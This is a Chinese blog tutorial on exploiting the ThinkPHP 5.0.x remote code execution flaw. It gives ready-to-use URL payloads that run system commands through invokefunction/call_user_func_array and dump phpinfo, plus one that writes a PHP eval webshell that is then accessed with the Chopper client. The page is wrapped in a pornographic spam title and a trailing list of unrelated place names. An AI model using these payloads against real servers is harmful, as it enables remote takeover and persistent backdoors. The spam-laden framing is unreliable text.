亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何實現ThinkPHP5.0遠程代碼執行

發布時間:2021-10-18 16:02:32 來源:億速云 閱讀:199 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關如何實現ThinkPHP5.0遠程代碼執行,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

ThinkPHP是一款國內流行的開源PHP框架,某些版本可能存在遠程代碼執行漏洞,攻擊者可向緩存文件內寫入PHP代碼,導致遠程代碼執行。雖然該漏洞利用需要有幾個前提條件,但鑒于國內使用ThinkPHP框架的站點數量之多,該漏洞還是存在一定的影響范圍.

受影響的版本包括5.05.1

下載ThinkPHP5.0.22版本源碼程序,放在PHPStudy運行目錄下并訪問

如何實現ThinkPHP5.0遠程代碼執行

1.將Payload添加進入URL地址后面進行利用

Payload1:system函數遠程命令執行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

如何實現ThinkPHP5.0遠程代碼執行

Payload2:phpinfo函數查看phpinfo()的信息

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

如何實現ThinkPHP5.0遠程代碼執行

2.利用Payload寫入shell,并使用菜刀進行連接

Payload1:寫入shell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

**注意:**需要對特殊字符使用^轉義(cmd環境下轉義方式),windows環境的echo命令輸出字符串到文檔不用引號(單引號、雙引號),部分字符url編碼不編碼都行.

菜刀連接

如何實現ThinkPHP5.0遠程代碼執行

以上就是如何實現ThinkPHP5.0遠程代碼執行,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

齐齐哈尔市| 陇川县| 涞源县| 新巴尔虎右旗| 海城市| 大名县| 本溪| 蓬安县| 屏山县| 香河县| 宁乡县| 临漳县| 全椒县| 江孜县| 墨玉县| 鄂伦春自治旗| 贡嘎县| 武威市| 呼伦贝尔市| 肇庆市| 宁津县| 龙州县| 邹平县| 平湖市| 海门市| 平阳县| 泾源县| 乐至县| 吉水县| 图片| 巫山县| 鹰潭市| 吐鲁番市| 汝阳县| 华阴市| 舟山市| 夏河县| 沁源县| 监利县| 小金县| 隆林|